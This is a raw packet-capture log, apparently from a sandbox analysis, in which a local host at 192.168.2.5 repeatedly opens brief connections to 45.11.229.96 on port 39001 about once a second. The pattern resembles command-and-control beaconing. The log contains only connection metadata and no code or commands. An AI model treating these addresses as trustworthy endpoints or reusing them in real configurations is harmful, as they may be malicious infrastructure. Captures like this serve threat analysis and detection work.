Sep 19, 2024 02:27:05.997734070 CEST	49851	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.002815962 CEST	39001	49851	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.004327059 CEST	49851	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.037380934 CEST	49851	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.042309999 CEST	39001	49851	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.046207905 CEST	49851	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.051084042 CEST	39001	49851	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.448982954 CEST	49851	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.453913927 CEST	39001	49851	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.453979969 CEST	49851	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.458765984 CEST	39001	49851	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.670195103 CEST	39001	49851	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.670265913 CEST	49851	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.670416117 CEST	49851	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.675153971 CEST	39001	49851	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.778960943 CEST	49852	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.783812046 CEST	39001	49852	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.784095049 CEST	49852	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.823681116 CEST	49852	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.828555107 CEST	39001	49852	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:06.832844973 CEST	49852	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:06.837762117 CEST	39001	49852	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:07.432459116 CEST	39001	49852	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:07.432945967 CEST	49852	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:07.433049917 CEST	49852	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:07.437903881 CEST	39001	49852	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:07.544523001 CEST	49853	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:07.549352884 CEST	39001	49853	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:07.553065062 CEST	49853	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:07.686929941 CEST	49853	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:07.691766024 CEST	39001	49853	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:07.691833019 CEST	49853	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:07.696629047 CEST	39001	49853	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:08.204665899 CEST	39001	49853	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:08.204730034 CEST	49853	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:08.204907894 CEST	49853	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:08.209626913 CEST	39001	49853	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:08.310158968 CEST	49854	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:08.315005064 CEST	39001	49854	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:08.316288948 CEST	49854	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:08.650625944 CEST	49854	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:08.655541897 CEST	39001	49854	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:08.655613899 CEST	49854	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:08.660410881 CEST	39001	49854	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:08.958944082 CEST	39001	49854	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:08.959243059 CEST	49854	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:08.959243059 CEST	49854	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:08.964061022 CEST	39001	49854	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:09.076021910 CEST	49855	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:09.080815077 CEST	39001	49855	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:09.080936909 CEST	49855	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:09.143917084 CEST	49855	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:09.149069071 CEST	39001	49855	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:09.149377108 CEST	49855	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:09.154284000 CEST	39001	49855	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:09.726437092 CEST	39001	49855	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:09.726505041 CEST	49855	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:09.726609945 CEST	49855	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:09.731337070 CEST	39001	49855	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:09.841512918 CEST	49856	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:09.846553087 CEST	39001	49856	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:09.846636057 CEST	49856	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.061058044 CEST	49856	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.066021919 CEST	39001	49856	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:10.068511963 CEST	49856	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.073358059 CEST	39001	49856	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:10.543490887 CEST	39001	49856	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:10.544744968 CEST	49856	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.544843912 CEST	49856	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.549657106 CEST	39001	49856	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:10.656255960 CEST	49857	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.661266088 CEST	39001	49857	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:10.664398909 CEST	49857	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.778970957 CEST	49857	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.783857107 CEST	39001	49857	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:10.783951044 CEST	49857	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:10.788779974 CEST	39001	49857	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:11.328953981 CEST	39001	49857	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:11.329170942 CEST	49857	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:11.329171896 CEST	49857	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:11.334136963 CEST	39001	49857	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:11.435210943 CEST	49858	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:11.440227032 CEST	39001	49858	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:11.440324068 CEST	49858	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:11.471575022 CEST	49858	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:11.476519108 CEST	39001	49858	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:11.476603031 CEST	49858	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:11.481388092 CEST	39001	49858	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:12.090373039 CEST	39001	49858	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:12.090600014 CEST	49858	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:12.090600014 CEST	49858	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:12.095606089 CEST	39001	49858	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:12.200997114 CEST	49859	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:12.206134081 CEST	39001	49859	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:12.206228018 CEST	49859	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:12.252022982 CEST	49859	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:12.256877899 CEST	39001	49859	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:12.256930113 CEST	49859	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:12.261704922 CEST	39001	49859	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:12.941915989 CEST	39001	49859	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:12.944350958 CEST	49859	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:12.944350958 CEST	49859	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:12.949218035 CEST	39001	49859	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:13.066915035 CEST	49860	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.072257042 CEST	39001	49860	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:13.072453022 CEST	49860	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.109261990 CEST	49860	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.114233971 CEST	39001	49860	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:13.116405010 CEST	49860	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.121274948 CEST	39001	49860	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:13.727619886 CEST	39001	49860	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:13.727700949 CEST	49860	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.727839947 CEST	49860	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.732631922 CEST	39001	49860	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:13.856971025 CEST	49861	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.862040997 CEST	39001	49861	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:13.862148046 CEST	49861	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.884540081 CEST	49861	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.889446020 CEST	39001	49861	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:13.889511108 CEST	49861	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:13.894330025 CEST	39001	49861	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:14.514925003 CEST	39001	49861	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:14.515023947 CEST	49861	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:14.515125990 CEST	49861	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:14.519890070 CEST	39001	49861	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:14.622627020 CEST	49862	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:14.627680063 CEST	39001	49862	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:14.627785921 CEST	49862	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:14.650687933 CEST	49862	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:14.656769991 CEST	39001	49862	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:14.656841040 CEST	49862	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:14.662796974 CEST	39001	49862	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:15.265319109 CEST	39001	49862	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:15.265491962 CEST	49862	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:15.265592098 CEST	49862	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:15.270519972 CEST	39001	49862	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:15.372837067 CEST	49863	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:15.377680063 CEST	39001	49863	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:15.377799988 CEST	49863	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:15.411216021 CEST	49863	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:15.419194937 CEST	39001	49863	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:15.419255972 CEST	49863	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:15.424253941 CEST	39001	49863	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:15.698859930 CEST	49863	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:15.703910112 CEST	39001	49863	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:15.706228971 CEST	49863	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:15.711000919 CEST	39001	49863	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:16.026396036 CEST	39001	49863	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:16.027631044 CEST	49863	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:16.027699947 CEST	49863	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:16.032495975 CEST	39001	49863	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:16.251565933 CEST	49864	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:16.256568909 CEST	39001	49864	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:16.256671906 CEST	49864	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:16.409565926 CEST	49864	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:16.414693117 CEST	39001	49864	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:16.414758921 CEST	49864	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:16.419713020 CEST	39001	49864	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:16.906514883 CEST	39001	49864	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:16.906613111 CEST	49864	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:16.906766891 CEST	49864	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:16.911961079 CEST	39001	49864	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:17.013654947 CEST	49865	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:17.019735098 CEST	39001	49865	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:17.019821882 CEST	49865	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:17.066642046 CEST	49865	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:17.071696043 CEST	39001	49865	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:17.071760893 CEST	49865	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:17.076689959 CEST	39001	49865	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:17.342525005 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:27:17.481295109 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:27:17.797039032 CEST	39001	49865	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:17.797157049 CEST	49865	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:17.797260046 CEST	49865	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:17.802114964 CEST	39001	49865	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:17.903894901 CEST	49866	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:17.909194946 CEST	39001	49866	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:17.912817001 CEST	49866	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:18.141066074 CEST	49866	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:18.145936966 CEST	39001	49866	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:18.146004915 CEST	49866	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:18.150954962 CEST	39001	49866	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:18.555916071 CEST	39001	49866	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:18.556116104 CEST	49866	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:18.556310892 CEST	49866	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:18.561084986 CEST	39001	49866	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:18.701330900 CEST	49867	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:18.706299067 CEST	39001	49867	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:18.706376076 CEST	49867	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.177992105 CEST	49867	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.184756994 CEST	39001	49867	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:19.184834003 CEST	49867	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.190582991 CEST	39001	49867	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:19.506716967 CEST	39001	49867	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:19.506829977 CEST	49867	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.506949902 CEST	49867	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.513525009 CEST	39001	49867	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:19.622847080 CEST	49868	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.628467083 CEST	39001	49868	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:19.628599882 CEST	49868	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.665616035 CEST	49868	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.670439959 CEST	39001	49868	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:19.670506954 CEST	49868	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:19.675395966 CEST	39001	49868	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:20.324763060 CEST	39001	49868	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:20.324860096 CEST	49868	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:20.324978113 CEST	49868	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:20.329844952 CEST	39001	49868	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:20.435841084 CEST	49869	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:20.441560030 CEST	39001	49869	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:20.441656113 CEST	49869	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:20.514740944 CEST	49869	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:20.519761086 CEST	39001	49869	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:20.519834995 CEST	49869	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:20.525032997 CEST	39001	49869	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.069179058 CEST	39001	49869	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.069259882 CEST	49869	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.070384979 CEST	49869	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.075170040 CEST	39001	49869	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.186667919 CEST	49870	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.191576958 CEST	39001	49870	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.191919088 CEST	49870	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.231863022 CEST	49870	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.236902952 CEST	39001	49870	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.236958027 CEST	49870	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.241915941 CEST	39001	49870	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.822695017 CEST	39001	49870	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.822778940 CEST	49870	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.822880030 CEST	49870	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.827728987 CEST	39001	49870	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.935080051 CEST	49871	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.940221071 CEST	39001	49871	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.940710068 CEST	49871	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.987417936 CEST	49871	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.992327929 CEST	39001	49871	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:21.992383957 CEST	49871	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:21.997189999 CEST	39001	49871	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:22.573292017 CEST	39001	49871	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:22.575193882 CEST	49871	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:22.575426102 CEST	49871	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:22.581177950 CEST	39001	49871	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:22.686183929 CEST	49872	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:22.691205978 CEST	39001	49872	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:22.692689896 CEST	49872	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:22.733190060 CEST	49872	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:22.738066912 CEST	39001	49872	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:22.740560055 CEST	49872	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:22.745394945 CEST	39001	49872	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:23.331856012 CEST	39001	49872	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:23.331945896 CEST	49872	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:23.332055092 CEST	49872	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:23.337882042 CEST	39001	49872	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:23.438124895 CEST	49873	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:23.444137096 CEST	39001	49873	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:23.444221020 CEST	49873	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:23.529649973 CEST	49873	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:23.981288910 CEST	49873	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:24.613468885 CEST	49873	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:24.747378111 CEST	39001	49873	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:24.747419119 CEST	39001	49873	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:24.749075890 CEST	39001	49873	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:24.751490116 CEST	39001	49873	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:24.751836061 CEST	49873	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:24.751836061 CEST	49873	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:24.756716013 CEST	39001	49873	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:24.857110023 CEST	49874	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:24.862245083 CEST	39001	49874	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:24.862461090 CEST	49874	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:24.889621019 CEST	49874	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:24.894439936 CEST	39001	49874	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:24.895373106 CEST	49874	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:24.900150061 CEST	39001	49874	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:25.499027967 CEST	39001	49874	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:25.501065016 CEST	49874	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:25.574014902 CEST	49874	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:25.580358028 CEST	39001	49874	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:25.689826965 CEST	49875	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:25.695491076 CEST	39001	49875	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:25.698400021 CEST	49875	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:25.896553993 CEST	49875	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:25.901392937 CEST	39001	49875	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:25.901441097 CEST	49875	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:25.906217098 CEST	39001	49875	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:26.472925901 CEST	39001	49875	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:26.473031044 CEST	49875	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:26.473103046 CEST	49875	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:26.477933884 CEST	39001	49875	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:26.591730118 CEST	49876	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:26.596569061 CEST	39001	49876	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:26.596690893 CEST	49876	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:26.636234045 CEST	49876	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:26.641125917 CEST	39001	49876	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:26.641199112 CEST	49876	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:26.646024942 CEST	39001	49876	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:27.218854904 CEST	39001	49876	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:27.219089031 CEST	49876	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:27.219192982 CEST	49876	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:27.223915100 CEST	39001	49876	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:27.326325893 CEST	49877	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:27.331083059 CEST	39001	49877	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:27.331219912 CEST	49877	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:27.377104044 CEST	49877	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:27.381932020 CEST	39001	49877	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:27.383410931 CEST	49877	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:27.388226032 CEST	39001	49877	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:27.951363087 CEST	39001	49877	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:27.952730894 CEST	49877	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:27.952841043 CEST	49877	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:27.957582951 CEST	39001	49877	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:28.066274881 CEST	49878	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.071103096 CEST	39001	49878	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:28.073282003 CEST	49878	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.506895065 CEST	49878	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.511708021 CEST	39001	49878	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:28.511750937 CEST	49878	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.516531944 CEST	39001	49878	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:28.711144924 CEST	39001	49878	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:28.713121891 CEST	49878	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.713217974 CEST	49878	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.717994928 CEST	39001	49878	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:28.825721025 CEST	49879	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.830574036 CEST	39001	49879	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:28.832456112 CEST	49879	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.874383926 CEST	49879	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:27:28.879832029 CEST	39001	49879	45.11.229.96	192.168.2.5
Sep 19, 2024 02:27:28.879895926 CEST	49879	39001	192.168.2.5	45.11.229.96
